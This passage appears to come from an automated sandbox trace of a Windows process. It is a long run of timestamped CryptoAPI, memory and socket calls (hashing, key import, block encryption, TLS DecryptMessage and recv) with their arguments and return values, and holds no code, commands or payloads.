hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0143.610] CryptHashData (hHash=0x432cb8, pbData=0x3594d18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0143.610] malloc (_Size=0x14) returned 0x3f65460 [0143.610] free (_Block=0x0) [0143.610] CryptGetHashParam (in: hHash=0x432cb8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x37dfa34) returned 1 [0143.610] CryptDestroyHash (hHash=0x432cb8) returned 1 [0143.610] free (_Block=0x3f65460) [0143.610] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0143.610] CryptHashData (hHash=0x432978, pbData=0x3594d18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0143.610] malloc (_Size=0x14) returned 0x3f65340 [0143.611] free (_Block=0x0) [0143.611] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x37dfa34) returned 1 [0143.611] CryptDestroyHash (hHash=0x432978) returned 1 [0143.611] free (_Block=0x3f65340) [0143.611] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0143.611] CryptHashData (hHash=0x432cb8, pbData=0x3594d18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0143.611] malloc (_Size=0x14) returned 0x3f65360 [0143.611] free (_Block=0x0) [0143.611] CryptGetHashParam (in: hHash=0x432cb8, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x37dfa34) returned 1 [0143.611] CryptDestroyHash (hHash=0x432cb8) returned 1 [0143.611] free (_Block=0x3f65360) [0143.611] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0143.611] CryptHashData (hHash=0x432978, pbData=0x3594d18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0143.611] malloc (_Size=0x14) returned 0x3f65300 [0143.611] free (_Block=0x0) [0143.611] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x37dfa34) returned 1 [0143.611] CryptDestroyHash (hHash=0x432978) returned 1 [0143.611] free (_Block=0x3f65300) [0143.611] free (_Block=0x3594d18) [0143.611] malloc (_Size=0x50) returned 0x3d9af60 [0143.612] free (_Block=0x0) [0143.612] free (_Block=0x60b310) [0143.612] free (_Block=0x609b60) [0143.612] malloc (_Size=0xb8) returned 0x3594d18 [0143.612] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594dc8 | out: phHash=0x3594dc8) returned 1 [0143.612] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3594dcc | out: phHash=0x3594dcc) returned 1 [0143.612] CryptHashData (hHash=0x432d78, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0143.612] CryptHashData (hHash=0x432db8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0143.612] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x4329f8) returned 1 [0143.612] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0143.612] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432cb8) returned 1 [0143.612] CryptSetKeyParam (hKey=0x432cb8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0143.612] free (_Block=0x3d9af60) [0143.612] malloc (_Size=0x10) returned 0x3648cb0 [0143.612] free (_Block=0x0) [0143.612] SetEvent (hEvent=0x5c8) returned 1 [0143.613] free (_Block=0x3d81e60) [0143.613] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0143.613] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0144.417] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0144.417] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.417] free (_Block=0x0) [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.417] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.418] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.419] malloc (_Size=0x1fd) returned 0x3def010 [0144.419] free (_Block=0x0) [0144.419] free (_Block=0x36915b0) [0144.419] malloc (_Size=0x1fd) returned 0x36915b0 [0144.419] free (_Block=0x0) [0144.419] CryptDuplicateHash (in: hHash=0x432db8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0144.419] CryptHashData (hHash=0x432978, pbData=0x36915b0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.419] malloc (_Size=0x14) returned 0x3f65280 [0144.419] free (_Block=0x0) [0144.419] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfacc) returned 1 [0144.419] CryptHashData (hHash=0x432db8, pbData=0x36915b0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.419] free (_Block=0x3f65280) [0144.419] CryptDestroyHash (hHash=0x432978) returned 1 [0144.419] free (_Block=0x36915b0) [0144.419] free (_Block=0x3d81e60) [0144.419] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.419] free (_Block=0x0) [0144.420] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432d38) returned 1 [0144.423] CryptExportKey (in: hKey=0x432d38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0144.423] CryptExportKey (in: hKey=0x432d38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0144.423] malloc (_Size=0x80) returned 0x609e90 [0144.423] free (_Block=0x0) [0144.423] CryptDestroyKey (hKey=0x432d38) returned 1 [0144.423] malloc (_Size=0x64) returned 0x60b0e0 [0144.423] free (_Block=0x0) [0144.423] malloc (_Size=0x80) returned 0x609a50 [0144.423] free (_Block=0x0) [0144.423] malloc (_Size=0xc0) returned 0x605a18 [0144.423] free (_Block=0x609a50) [0144.423] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0144.423] CryptHashData (hHash=0x432d38, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0144.423] malloc (_Size=0x14) returned 0x3f65280 [0144.423] free (_Block=0x0) [0144.423] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfa34) returned 1 [0144.423] CryptDestroyHash (hHash=0x432d38) returned 1 [0144.424] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0144.424] CryptHashData (hHash=0x4329b8, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0144.424] malloc (_Size=0x14) returned 0x3f653e0 [0144.424] free (_Block=0x0) [0144.424] CryptGetHashParam (in: hHash=0x4329b8, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x37dfa34) returned 1 [0144.424] CryptDestroyHash (hHash=0x4329b8) returned 1 [0144.424] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0144.424] CryptHashData (hHash=0x432d38, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0144.424] malloc (_Size=0x14) returned 0x3f653c0 [0144.424] free (_Block=0x0) [0144.424] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x37dfa34) returned 1 [0144.424] CryptDestroyHash (hHash=0x432d38) returned 1 [0144.424] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0144.424] CryptHashData (hHash=0x432738, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0144.424] malloc (_Size=0x14) returned 0x3f65280 [0144.424] free (_Block=0x0) [0144.424] CryptGetHashParam (in: hHash=0x432738, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfa34) returned 1 [0144.424] CryptDestroyHash (hHash=0x432738) returned 1 [0144.424] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0144.424] CryptHashData (hHash=0x432d38, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0144.424] malloc (_Size=0x14) returned 0x3f65280 [0144.424] free (_Block=0x0) [0144.424] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfa34) returned 1 [0144.425] CryptDestroyHash (hHash=0x432d38) returned 1 [0144.425] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x605ac8 | out: phHash=0x605ac8) returned 1 [0144.425] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x605acc | out: phHash=0x605acc) returned 1 [0144.425] CryptHashData (hHash=0x432d38, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0144.425] CryptHashData (hHash=0x432eb8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0144.425] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432738) returned 1 [0144.425] CryptSetKeyParam (hKey=0x432738, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0144.425] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x4327b8) returned 1 [0144.425] CryptSetKeyParam (hKey=0x4327b8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0144.425] free (_Block=0x3d9ab40) [0144.425] SetEvent (hEvent=0x5c8) returned 1 [0144.425] free (_Block=0x3df04b8) [0144.425] free (_Block=0x3d81e60) [0144.425] free (_Block=0x3def010) [0144.425] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0144.425] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0144.793] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0144.794] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.794] free (_Block=0x0) [0144.794] malloc (_Size=0x1fd) returned 0x3def010 [0144.794] free (_Block=0x0) [0144.794] free (_Block=0x0) [0144.794] free (_Block=0x3d81e60) [0144.795] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.795] free (_Block=0x0) [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.795] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.796] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 